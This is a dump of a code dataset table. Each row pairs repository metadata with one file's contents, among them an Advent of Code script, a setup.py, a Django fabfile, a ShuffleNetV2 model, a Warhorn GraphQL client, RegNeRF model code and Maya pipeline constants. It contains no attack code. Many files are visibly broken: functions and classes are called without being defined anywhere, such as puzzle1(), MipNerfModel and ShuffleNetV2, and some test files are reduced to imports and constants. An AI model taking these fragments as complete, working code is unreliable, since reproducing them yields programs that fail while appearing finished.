hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 11 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 251 | max_stars_repo_name stringlengths 4 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 251 | max_issues_repo_name stringlengths 4 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 251 | max_forks_repo_name stringlengths 4 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.05M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.04M | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
c03228b2ca7a1e5710fd3d833f2457053dd2e585 | 834 | py | Python | 2015/solutions/day1.py | rsizem2/aoc_2020 | aa2dbf72a4c44930755bd9cc132ad7854f742f09 | [
"MIT"
] | null | null | null | 2015/solutions/day1.py | rsizem2/aoc_2020 | aa2dbf72a4c44930755bd9cc132ad7854f742f09 | [
"MIT"
] | null | null | null | 2015/solutions/day1.py | rsizem2/aoc_2020 | aa2dbf72a4c44930755bd9cc132ad7854f742f09 | [
"MIT"
] | null | null | null |
puzzle1()
puzzle2() | 20.85 | 46 | 0.464029 |
c032d43f5d12902206b5df36fccb87158ca21d3e | 466 | py | Python | setup.py | Kamuish/StarSearch | 63e5f6ee544ab1d48ae5b0d8e9067cedccc40d1e | [
"MIT"
] | null | null | null | setup.py | Kamuish/StarSearch | 63e5f6ee544ab1d48ae5b0d8e9067cedccc40d1e | [
"MIT"
] | null | null | null | setup.py | Kamuish/StarSearch | 63e5f6ee544ab1d48ae5b0d8e9067cedccc40d1e | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from setuptools import setup
# Packaging metadata for the "starsearch" distribution (setuptools).
setup(name='starsearch',
      version='0.3',
      description='Package to dig into the ESO archives',
      # NOTE(review): "Joo Camacho" looks mojibake-damaged (likely "Joao");
      # this is runtime metadata, so confirm with the project before changing.
      author='Joo Camacho',
      author_email='joao.camacho@astro.up.pt',
      license='MIT',
      url='https://github.com/jdavidrcamacho/starsearch',
      packages=['starsearch'],
      # Hard runtime dependencies pulled in on install.
      install_requires=[
          'numpy',
          'astroquery',
          "astropy",
      ],
      )
| 24.526316 | 57 | 0.592275 |
c033f2c7fd8a3e95e76135943dd54b89791b98ca | 4,192 | py | Python | test/integration/test_genomes.py | beatrizserrano/galaxy | e149d9d32e1bca6c07c38b1a9cdabfee60323610 | [
"CC-BY-3.0"
] | null | null | null | test/integration/test_genomes.py | beatrizserrano/galaxy | e149d9d32e1bca6c07c38b1a9cdabfee60323610 | [
"CC-BY-3.0"
] | 6 | 2021-11-11T20:57:49.000Z | 2021-12-10T15:30:33.000Z | test/integration/test_genomes.py | beatrizserrano/galaxy | e149d9d32e1bca6c07c38b1a9cdabfee60323610 | [
"CC-BY-3.0"
] | null | null | null | import os
import tempfile
from unittest.mock import patch
from galaxy.exceptions import (
ObjectNotFound,
ReferenceDataError,
)
from galaxy_test.driver import integration_util
# Fixture rows ("<dbkey>\t<display name>") used as test build metadata.
BUILDS_DATA = (
    "?\tunspecified (?)",
    "hg_test\tdescription of hg_test",
    "hg_test_nolen\tdescription of hg_test_nolen",
)
# Fixture rows ("<chrom>\t<length>"); the lengths match human chr1-chr3
# (GRCh38-like) -- TODO confirm the intended assembly.
LEN_DATA = (
    "chr1\t248956422",
    "chr2\t242193529",
    "chr3\t198295559",
)
| 37.765766 | 105 | 0.659351 |
c034484825d157d2b2d547cd6cfeff947673d5f5 | 2,310 | py | Python | examples/exersice2DimRed.py | s2812135/Data_Challenges_WiSe2122 | a55372f444e7344af4e2e1f04e4244fb8cefeefe | [
"MIT"
] | null | null | null | examples/exersice2DimRed.py | s2812135/Data_Challenges_WiSe2122 | a55372f444e7344af4e2e1f04e4244fb8cefeefe | [
"MIT"
] | null | null | null | examples/exersice2DimRed.py | s2812135/Data_Challenges_WiSe2122 | a55372f444e7344af4e2e1f04e4244fb8cefeefe | [
"MIT"
] | null | null | null | import numpy as np
import pandas as pd
import os
from tqdm import tqdm
import pacmap
import matplotlib.pyplot as plt
from sklearn.manifold import TSNE
import umap
| 29.615385 | 98 | 0.587446 |
c0347d378ceb67aeed162b5a86aeec563c7f0a79 | 5,757 | py | Python | release.py | jhofmann/yubiauth | 724feb45b54db196af406edf87f2bfcc2e849842 | [
"BSD-2-Clause"
] | 17 | 2015-01-06T16:28:55.000Z | 2021-11-21T15:26:01.000Z | release.py | DalavanCloud/yubiauth | 42292de043f8e106384796ff233be0b2dc930f60 | [
"BSD-2-Clause"
] | 4 | 2015-09-11T14:00:14.000Z | 2017-05-25T15:00:17.000Z | release.py | DalavanCloud/yubiauth | 42292de043f8e106384796ff233be0b2dc930f60 | [
"BSD-2-Clause"
] | 9 | 2015-03-11T22:37:47.000Z | 2022-03-01T21:17:35.000Z | # Copyright (c) 2013 Yubico AB
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from distutils import log
from distutils.core import Command
from distutils.errors import DistutilsSetupError
import os
import re
from datetime import date
| 38.125828 | 78 | 0.605176 |
c034cf5f5c4b3712b5f752c6874beaede0ef7f49 | 10,949 | py | Python | fabfile.py | 8081594571/bgtools_web | f99389788f6e8db0d1b7781f41af819efd7e9dc2 | [
"MIT"
] | 1 | 2020-10-01T15:56:12.000Z | 2020-10-01T15:56:12.000Z | fabfile.py | Arvindvishwakarma/bgtools_web | 82b03c49e00a6ffcc563289c68bcf2a7a6985633 | [
"MIT"
] | null | null | null | fabfile.py | Arvindvishwakarma/bgtools_web | 82b03c49e00a6ffcc563289c68bcf2a7a6985633 | [
"MIT"
] | 1 | 2020-10-01T06:53:41.000Z | 2020-10-01T06:53:41.000Z |
# Credit goes to https://bitbucket.org/spookylukey/django-fabfile-starter/src
import os
import datetime as dt
from io import StringIO
import json
import posixpath
import fabric
import requests
from fabsettings import (USER, HOST, DJANGO_APP_NAME,
DJANGO_APPS_DIR, LOGS_ROOT_DIR,
APP_PORT, GUNICORN_WORKERS, DJANGO_PROJECT_NAME,
STAGING_APP_PORT)
def upload_template(c, filename, destination, context=None, template_dir=None):
    """Render a Jinja2 template and upload the result to the remote host.

    Args:
        c: fabric connection used for the upload.
        filename: template file name, resolved against ``template_dir``.
        destination: remote path the rendered text is uploaded to.
        context: mapping of template variables (defaults to empty).
        template_dir: directory containing the template (defaults to the
            current working directory).

    Returns:
        The result of ``c.put`` for the uploaded file.
    """
    template_dir = template_dir or os.getcwd()
    # Imported locally so the fabfile stays importable without jinja2.
    from jinja2 import Environment, FileSystemLoader
    jenv = Environment(loader=FileSystemLoader(template_dir))
    context = context if context is not None else {}
    text = jenv.get_template(filename).render(**context)
    # Uploaded as str; a previous revision encoded to UTF-8 bytes here to
    # work around Paramiko SFTP decode issues with non-ASCII characters.
    return c.put(
        StringIO(text),
        destination,
    )
def venv(c):
    """Return a prefix context that runs subsequent commands inside the
    project virtualenv located at ``c.config.bgtools.VENV_DIR``."""
    activate = "source {}/bin/activate".format(c.config.bgtools.VENV_DIR)
    return c.prefix(activate)
def rsync_source(c):
    """Push the local ``bgtools`` source tree to the app root on the server."""
    settings = c.config.bgtools
    local_src = os.path.join(settings.LOCAL_DIR, 'bgtools')
    rsync(c, local_src, settings.DJANGO_APP_ROOT)
def collect_static(c):
    """Run Django's ``collectstatic`` on the server, inside the virtualenv
    and from the project source directory."""
    with venv(c):
        with c.cd(c.config.bgtools.SRC_DIR):
            c.run('python manage.py collectstatic --no-input')
| 38.017361 | 115 | 0.574664 |
c034fca0ee726969b9b040225228ff287755ee94 | 5,273 | py | Python | Deep Thumbnail Face Classification and Verification/models/ShuffleNetV2.py | roycechan/portfolio | 5e6a916031d2a3c60d2757483fc4765941d6f1f0 | [
"MIT"
] | 1 | 2022-03-14T04:59:54.000Z | 2022-03-14T04:59:54.000Z | Deep Thumbnail Face Classification and Verification/models/ShuffleNetV2.py | roycechan/portfolio | 5e6a916031d2a3c60d2757483fc4765941d6f1f0 | [
"MIT"
] | null | null | null | Deep Thumbnail Face Classification and Verification/models/ShuffleNetV2.py | roycechan/portfolio | 5e6a916031d2a3c60d2757483fc4765941d6f1f0 | [
"MIT"
] | null | null | null | import torch
from torch import nn
from torch.autograd import Variable
import config
def test():
    """Smoke test: push one random batch through ShuffleNetV2 and print the
    output size."""
    net = ShuffleNetV2(2300, 2)
    # torch.autograd.Variable has been deprecated since PyTorch 0.4; plain
    # tensors carry autograd state themselves, so wrap-free randn suffices.
    x = torch.randn(3, 3, 32, 32)
    y = net(x)
    print("end", y.size())


if __name__ == '__main__':
    test()
| 36.365517 | 120 | 0.616537 |
c036324f468e909b938249cc16b70ee9b1588b7d | 6,264 | py | Python | warhorn_api.py | jagerkin/warbot | d30851a454b9eef45d5d4d095ae63e846229153d | [
"Apache-2.0"
] | 1 | 2021-12-23T05:09:01.000Z | 2021-12-23T05:09:01.000Z | warhorn_api.py | jagerkin/warbot | d30851a454b9eef45d5d4d095ae63e846229153d | [
"Apache-2.0"
] | 1 | 2021-12-23T05:00:24.000Z | 2021-12-23T05:00:24.000Z | warhorn_api.py | jagerkin/warbot | d30851a454b9eef45d5d4d095ae63e846229153d | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 Michael Olson
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Warhorn GraphQL client."""
import collections.abc
import datetime
import logging
from typing import AsyncGenerator, Dict, Optional, Sequence, Tuple, Union
import pytz
from gql import gql, Client
from gql.transport.aiohttp import AIOHTTPTransport
from gql.transport.aiohttp import log as gql_logger
# GraphQL query template for Warhorn event sessions. '{slug}' and
# '{startsAfter}' are substituted via str.format, which is why every literal
# GraphQL brace is doubled ('{{' / '}}').
# NOTE(review): the query's internal indentation was lost upstream; GraphQL
# ignores whitespace, so the string is preserved exactly as found.
_QUERY = '''\
{{
eventSessions(
events: ["{slug}"],
startsAfter: "{startsAfter}") {{
nodes {{
status
scenario {{
name
}}
scenarioOffering {{
customName
}}
signupUrl
uuid
slot {{
timezone
startsAt
endsAt
}}
}}
}}
}}'''
# Recursive alias for a decoded GraphQL/JSON value: a string, an object
# (dict of these), a sequence of these, or None.
_GQLNode = Optional[Union[str, Dict[str, '_GQLNode'], Sequence['_GQLNode']]]
def _strings_exists(*strings: str) -> bool:
"""Check that all of the strings exist and none of them are just the str 'None'."""
for s in strings:
if s in ('', 'None'):
return False
return True
| 32.968421 | 98 | 0.608397 |
c036c5b85abcd0ef620f9e8bbff718b557b0b6ee | 13,750 | py | Python | regnerf/internal/models.py | gunpowder78/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | 1 | 2022-03-13T21:48:52.000Z | 2022-03-13T21:48:52.000Z | regnerf/internal/models.py | gunpowder78/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | null | null | null | regnerf/internal/models.py | gunpowder78/google-research | d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5 | [
"Apache-2.0"
] | 1 | 2022-03-30T07:20:29.000Z | 2022-03-30T07:20:29.000Z | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Different model implementation plus a general port for all the models."""
import functools
from typing import Any, Callable
from flax import linen as nn
import gin
from internal import mip, utils # pylint: disable=g-multiple-import
import jax
from jax import random
import jax.numpy as jnp
def construct_mipnerf(rng, rays, config):
  """Construct a Neural Radiance Field.

  Args:
    rng: jnp.ndarray. Random number generator.
    rays: an example of input Rays.
    config: A Config class.

  Returns:
    model: nn.Model. Nerf model with parameters.
    state: flax.Module.state. Nerf model state for stateful parameters.
  """
  # Initialize on a tiny bundle of 10 flattened rays to keep memory overhead
  # low during model construction.
  flatten_and_take = lambda x: jnp.reshape(x, [-1, x.shape[-1]])[:10]
  sample_rays = jax.tree_map(flatten_and_take, rays)
  model = MipNerfModel(config=config)
  init_variables = model.init(
      rng,
      rng=None,
      rays=sample_rays,
      resample_padding=0.,
      compute_extras=False)
  return model, init_variables
def cosine_easing_window(alpha, min_freq_log2=0, max_freq_log2=16):
  """Eases in each frequency one by one with a cosine.

  This is equivalent to taking a Tukey window and sliding it to the right
  along the frequency spectrum.

  Args:
    alpha: will ease in each frequency as alpha goes from 0.0 to num_freqs.
    min_freq_log2: the lower frequency band.
    max_freq_log2: the upper frequency band.

  Returns:
    A [2, 3 * num_bands] array: the per-channel window weights, stacked twice.
  """
  band_count = max_freq_log2 - min_freq_log2
  freq_bands = jnp.linspace(min_freq_log2, max_freq_log2, band_count)
  ramp = jnp.clip(alpha - freq_bands, 0.0, 1.0)
  window = 0.5 * (1 + jnp.cos(jnp.pi * ramp + jnp.pi))
  window = window.reshape(-1)
  # The first four frequencies are always fully enabled.
  window = jnp.concatenate([jnp.ones_like(window[:4]), window[4:]])
  # Broadcast each band weight across 3 channels, then flatten.
  window = jnp.repeat(window.reshape(-1, 1), 3, axis=1).reshape(-1)
  return jnp.stack([window, window])
def render_image(render_fn, rays, rng, config):
  """Render all the pixels of an image (in test mode).

  The rays are flattened, split into chunks of `config.render_chunk_size`,
  padded so each chunk divides evenly across devices, sharded across
  hosts/devices, rendered, and stitched back into (height, width, ...) images.

  Args:
    render_fn: function, jit-ed render function.
    rays: a `Rays` pytree, the rays to be rendered.
    rng: jnp.ndarray, random number generator (used in training mode only).
    config: A Config class.

  Returns:
    rgb: jnp.ndarray, rendered color image.
    disp: jnp.ndarray, rendered disparity image.
    acc: jnp.ndarray, rendered accumulated weights per pixel.
  """
  height, width = rays.origins.shape[:2]
  num_rays = height * width
  # Flatten the (H, W, ...) ray pytree into a single (H*W, ...) batch.
  rays = jax.tree_map(lambda r: r.reshape((num_rays, -1)), rays)
  host_id = jax.host_id()
  chunks = []
  idx0s = range(0, num_rays, config.render_chunk_size)
  for i_chunk, idx0 in enumerate(idx0s):
    # pylint: disable=cell-var-from-loop
    if i_chunk % max(1, len(idx0s) // 10) == 0:
      print(f'Rendering chunk {i_chunk}/{len(idx0s)-1}')
    chunk_rays = (
        jax.tree_map(lambda r: r[idx0:idx0 + config.render_chunk_size], rays))
    # Edge-pad the last chunk so it divides evenly across devices.
    actual_chunk_size = chunk_rays.origins.shape[0]
    rays_remaining = actual_chunk_size % jax.device_count()
    if rays_remaining != 0:
      padding = jax.device_count() - rays_remaining
      chunk_rays = jax.tree_map(
          lambda r: jnp.pad(r, ((0, padding), (0, 0)), mode='edge'), chunk_rays)
    else:
      padding = 0
    # After padding the number of chunk_rays is always divisible by host_count.
    rays_per_host = chunk_rays.origins.shape[0] // jax.host_count()
    start, stop = host_id * rays_per_host, (host_id + 1) * rays_per_host
    chunk_rays = jax.tree_map(lambda r: utils.shard(r[start:stop]), chunk_rays)
    chunk_renderings = render_fn(rng, chunk_rays)
    # Unshard the renderings
    chunk_renderings = [{k: utils.unshard(v[0], padding)
                         for k, v in r.items()}
                        for r in chunk_renderings]
    # Keep the final level's rendering, but collect per-level 'ray_*' extras.
    chunk_rendering = chunk_renderings[-1]
    keys = [k for k in chunk_renderings[0] if k.find('ray_') == 0]
    for k in keys:
      chunk_rendering[k] = [r[k] for r in chunk_renderings]
    chunks.append(chunk_rendering)
  # Concatenate the chunks; image-shaped outputs are reshaped to (H, W, ...).
  rendering = {}
  for k in chunks[0]:
    if isinstance(chunks[0][k], list):
      rendering[k] = [r[k] for r in chunks]
      ds = range(len(rendering[k][0]))
      rendering[k] = [jnp.concatenate([r[d] for r in rendering[k]]) for d in ds]
    else:
      rendering[k] = jnp.concatenate([r[k] for r in chunks])
      rendering[k] = (
          rendering[k].reshape((height, width) + chunks[0][k].shape[1:]))
  # After all of the ray bundles have been concatenated together, extract a
  # new random bundle (deterministically) from the concatenation that is the
  # same size as one of the individual bundles.
  keys = [k for k in rendering if k.find('ray_') == 0]
  if keys:
    ray_idx = random.permutation(
        random.PRNGKey(0), rendering[keys[0]][0].shape[0])[:config.vis_num_rays]
    for k in keys:
      rendering[k] = [r[ray_idx] for r in rendering[k]]
  return rendering
| 38.300836 | 84 | 0.663273 |
c03730c3fe56f310fa37ff5662b46d4ef0a1326f | 13,948 | py | Python | Gems/AtomLyIntegration/TechnicalArt/DccScriptingInterface/Tools/DCC/Maya/constants.py | prophetl33t/o3de | eaeeb883eee1594b1b93327f6909eebd1a826caf | [
"Apache-2.0",
"MIT"
] | null | null | null | Gems/AtomLyIntegration/TechnicalArt/DccScriptingInterface/Tools/DCC/Maya/constants.py | prophetl33t/o3de | eaeeb883eee1594b1b93327f6909eebd1a826caf | [
"Apache-2.0",
"MIT"
] | null | null | null | Gems/AtomLyIntegration/TechnicalArt/DccScriptingInterface/Tools/DCC/Maya/constants.py | prophetl33t/o3de | eaeeb883eee1594b1b93327f6909eebd1a826caf | [
"Apache-2.0",
"MIT"
] | null | null | null | # coding:utf-8
#!/usr/bin/python
#
# Copyright (c) Contributors to the Open 3D Engine Project.
# For complete copyright and license terms please see the LICENSE at the root of this distribution.
#
# SPDX-License-Identifier: Apache-2.0 OR MIT
#
#
# -------------------------------------------------------------------------
"""! @brief
Module Documentation:
< DCCsi >:: Tools/DCC/Maya/constants.py
This module contains default values for commony used constants & strings.
We can make an update here easily that is propogated elsewhere.
"""
# -------------------------------------------------------------------------
# built-ins
import sys
import os
import site
import timeit
import inspect
from os.path import expanduser
from pathlib import Path
import logging as _logging
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
_START = timeit.default_timer() # start tracking
# global scope
_MODULENAME = 'Tools.DCC.Maya.constants'
_LOGGER = _logging.getLogger(_MODULENAME)
_LOGGER.debug('Initializing: {}.'.format({_MODULENAME}))
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# Maya is frozen
# module path when frozen
_MODULE_PATH = Path(os.path.abspath(inspect.getfile(inspect.currentframe())))
_LOGGER.debug('_MODULE_PATH: {}'.format(_MODULE_PATH))
_PATH_DCCSI_TOOLS_MAYA = Path(_MODULE_PATH.parent)
_PATH_DCCSI_TOOLS_MAYA = Path(os.getenv('PATH_DCCSI_TOOLS_MAYA',
_PATH_DCCSI_TOOLS_MAYA.as_posix()))
_PATH_DCCSI_TOOLS_DCC = Path(_PATH_DCCSI_TOOLS_MAYA.parent)
_PATH_DCCSI_TOOLS_DCC = Path(os.getenv('PATH_DCCSI_TOOLS_DCC',
_PATH_DCCSI_TOOLS_DCC.as_posix()))
_PATH_DCCSI_TOOLS = Path(_PATH_DCCSI_TOOLS_DCC.parent)
_PATH_DCCSI_TOOLS = Path(os.getenv('PATH_DCCSI_TOOLS',
_PATH_DCCSI_TOOLS.as_posix()))
# we need to set up basic access to the DCCsi
_PATH_DCCSIG = Path(_PATH_DCCSI_TOOLS.parent)
_PATH_DCCSIG = Path(os.getenv('PATH_DCCSIG', _PATH_DCCSIG.as_posix()))
site.addsitedir(_PATH_DCCSIG.as_posix())
_LOGGER.debug('_PATH_DCCSIG: {}'.format(_PATH_DCCSIG.as_posix()))
# this is the shared default requirements.txt file to install for python 3.6.x+
DCCSI_PYTHON_REQUIREMENTS = Path(_PATH_DCCSIG, 'requirements.txt').as_posix()
# if using maya 2020 or less with py2.7 override with and use the one here:
# "DccScriptingInterface\Tools\DCC\Maya\requirements.txt"
# now we have azpy api access
from azpy.env_bool import env_bool
from azpy.constants import ENVAR_DCCSI_GDEBUG
from azpy.constants import ENVAR_DCCSI_DEV_MODE
from azpy.constants import ENVAR_DCCSI_LOGLEVEL
from azpy.constants import ENVAR_DCCSI_GDEBUGGER
from azpy.constants import FRMT_LOG_LONG
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
from azpy.constants import * # but here are the specific ones we are gonna use
from azpy.constants import PATH_PROGRAMFILES_X64
from azpy.constants import TAG_PY_MAJOR
from azpy.constants import TAG_PY_MINOR
from azpy.constants import PATH_USER_HOME
from azpy.constants import PATH_USER_O3DE
from azpy.constants import ENVAR_O3DE_DEV
from azpy.constants import PATH_O3DE_DEV
from azpy.constants import ENVAR_PATH_DCCSIG
from azpy.constants import PATH_DCCSIG
from azpy.constants import ENVAR_DCCSI_LOG_PATH
from azpy.constants import PATH_DCCSI_LOG_PATH
from azpy.constants import ENVAR_DCCSI_PY_VERSION_MAJOR
from azpy.constants import ENVAR_DCCSI_PY_VERSION_MINOR
from azpy.constants import ENVAR_PATH_DCCSI_PYTHON_LIB
from azpy.constants import STR_PATH_DCCSI_PYTHON_LIB
from azpy.constants import PATH_DCCSI_PYTHON_LIB
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# dcc: Maya ENVAR constants
ENVAR_DCCSI_PY_VERSION_MAJOR=str("DCCSI_PY_VERSION_MAJOR")
ENVAR_DCCSI_PY_VERSION_MINOR=str("DCCSI_PY_VERSION_MINOR")
ENVAR_DCCSI_PY_VERSION_RELEASE=str("DCCSI_PY_VERSION_RELEASE")
ENVAR_MAYA_NO_CONSOLE_WINDOW = str("MAYA_NO_CONSOLE_WINDOW")
ENVAR_MAYA_SHOW_OUTPUT_WINDOW = str("MAYA_SHOW_OUTPUT_WINDOW")
TAG_O3DE_DCC_MAYA_MEL = 'dccsi_setup.mel'
TAG_MAYA_WORKSPACE = 'workspace.mel'
ENVAR_DCCSI_PY_MAYA = str('DCCSI_PY_MAYA')
ENVAR_MAYA_VERSION = str('MAYA_VERSION')
ENVAR_MAYA_LOCATION = str('MAYA_LOCATION')
ENVAR_PATH_DCCSI_TOOLS_MAYA = str('PATH_DCCSI_TOOLS_MAYA')
ENVAR_MAYA_MODULE_PATH = str('MAYA_MODULE_PATH')
ENVAR_MAYA_BIN_PATH = str('MAYA_BIN_PATH')
ENVAR_DCCSI_MAYA_PLUG_IN_PATH = str('DCCSI_MAYA_PLUG_IN_PATH')
ENVAR_MAYA_PLUG_IN_PATH = str('MAYA_PLUG_IN_PATH')
ENVAR_DCCSI_MAYA_SHELF_PATH = str('DCCSI_MAYA_SHELF_PATH')
ENVAR_MAYA_SHELF_PATH = str('MAYA_SHELF_PATH')
ENVAR_DCCSI_MAYA_XBMLANGPATH = str('DCCSI_MAYA_XBMLANGPATH')
ENVAR_XBMLANGPATH = str('XBMLANGPATH')
ENVAR_DCCSI_MAYA_SCRIPT_MEL_PATH = str('DCCSI_MAYA_SCRIPT_MEL_PATH')
ENVAR_DCCSI_MAYA_SCRIPT_PY_PATH = str('DCCSI_MAYA_SCRIPT_PY_PATH')
ENVAR_DCCSI_MAYA_SCRIPT_PATH = str("DCCSI_MAYA_SCRIPT_PATH")
ENVAR_MAYA_SCRIPT_PATH = str('MAYA_SCRIPT_PATH')
ENVAR_DCCSI_MAYA_SET_CALLBACKS = str('DCCSI_MAYA_SET_CALLBACKS')
ENVAR_MAYA_VP2_DEVICE_OVERRIDE=str("MAYA_VP2_DEVICE_OVERRIDE")
ENVAR_MAYA_OGS_DEVICE_OVERRIDE=str("MAYA_OGS_DEVICE_OVERRIDE")
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# Maya consts
#USER_HOME = Path.home()
# mimicing all values from: "DccScriptingInterface\Tools\Dev\Windows\Env_DCC_Maya.bat"
# note: these are just default values, they are only initially CONST
# if/when imported from here (constants.py)
DCCSI_PY_VERSION_MAJOR = 3
DCCSI_PY_VERSION_MINOR = 7
DCCSI_PY_VERSION_RELEASE = 7
# override with maya defaults
PATH_DCCSI_PYTHON_LIB = STR_PATH_DCCSI_PYTHON_LIB.format(_PATH_DCCSIG,
DCCSI_PY_VERSION_MAJOR,
DCCSI_PY_VERSION_MINOR)
# not actually a maya envar, to do: could rename DCCSI_MAYA_VERSION
MAYA_VERSION=2022
# is a maya envar
MAYA_PROJECT = _PATH_DCCSIG.as_posix()
PATH_DCCSI_TOOLS_MAYA = _PATH_DCCSI_TOOLS_MAYA.as_posix()
# is a maya envar
MAYA_MODULE_PATH = _PATH_DCCSI_TOOLS_MAYA.as_posix()
# is a maya envar
MAYA_LOCATION = Path(PATH_PROGRAMFILES_X64,'Autodesk', 'Maya{}'.format(MAYA_VERSION)).as_posix()
# is a maya envar
MAYA_BIN_PATH = Path(MAYA_LOCATION, 'bin').as_posix()
DCCSI_MAYA_SET_CALLBACKS = True
# is a maya envar
MAYA_NO_CONSOLE_WINDOW = False
MAYA_SHOW_OUTPUT_WINDOW = True
DCCSI_MAYA_EXE = Path(MAYA_BIN_PATH, 'maya.exe')
DCCSI_MAYABATCH_EXE = Path(MAYA_BIN_PATH, 'mayabatch.exe')
DCCSI_PY_MAYA = Path(MAYA_BIN_PATH, 'mayapy.exe')
# this is transient and will always track the exe this script is executing on
O3DE_PY_EXE = Path(sys.executable).as_posix()
DCCSI_PY_IDE = Path(DCCSI_PY_MAYA).as_posix()
DCCSI_MAYA_PLUG_IN_PATH = Path(PATH_DCCSI_TOOLS_MAYA,'plugins').as_posix()
# is a maya envar
MAYA_PLUG_IN_PATH = Path(DCCSI_MAYA_PLUG_IN_PATH).as_posix() # extend %MAYA_PLUG_IN_PATH%
# to do: remove or extend next PR, technically there can be more then one plugin path
#while MAYA_PLUG_IN_PATH:
#if ENVAR_MAYA_PLUG_IN_PATH in os.environ:
#maya_plug_pathlist = os.getenv(ENVAR_MAYA_PLUG_IN_PATH).split(os.pathsep)
#maya_plug_new_pathlist = maya_plug_pathlist.copy()
#maya_plug_new_pathlist.insert(0, Path(DCCSI_MAYA_PLUG_IN_PATH).as_posix())
#os.environ[ENVAR_MAYA_PLUG_IN_PATH] = os.pathsep.join(maya_plug_new_pathlist)
#else:
#os.environ[ENVAR_MAYA_PLUG_IN_PATH] = DCCSI_MAYA_PLUG_IN_PATH
#MAYA_PLUG_IN_PATH = os.getenv(ENVAR_MAYA_PLUG_IN_PATH, "< NOT SET >")
#break
DCCSI_MAYA_SHELF_PATH = Path(PATH_DCCSI_TOOLS_MAYA, 'Prefs', 'Shelves').as_posix()
DCCSI_MAYA_XBMLANGPATH = Path(PATH_DCCSI_TOOLS_MAYA, 'Prefs', 'icons').as_posix()
# is a maya envar
# maya resources, very oddly named
XBMLANGPATH = Path(DCCSI_MAYA_XBMLANGPATH).as_posix() # extend %XBMLANGPATH%
# to do: remove or extend next PR, technically there can be more then one resource path specified
#while XBMLANGPATH:
#if ENVAR_XBMLANGPATH in os.environ:
#maya_xbm_pathlist = os.getenv(ENVAR_XBMLANGPATH).split(os.pathsep)
#maya_xbm_new_pathlist = maya_xbm_pathlist.copy()
#maya_xbm_new_pathlist.insert(0, Path(DCCSI_MAYA_XBMLANGPATH).as_posix())
#os.environ[ENVAR_XBMLANGPATH] = os.pathsep.join(maya_xbm_new_pathlist)
#else:
#os.environ[ENVAR_XBMLANGPATH] = DCCSI_MAYA_XBMLANGPATH
#XBMLANGPATH = os.getenv(ENVAR_XBMLANGPATH, "< NOT SET >")
#break
DCCSI_MAYA_SCRIPT_PATH = Path(PATH_DCCSI_TOOLS_MAYA, 'Scripts').as_posix()
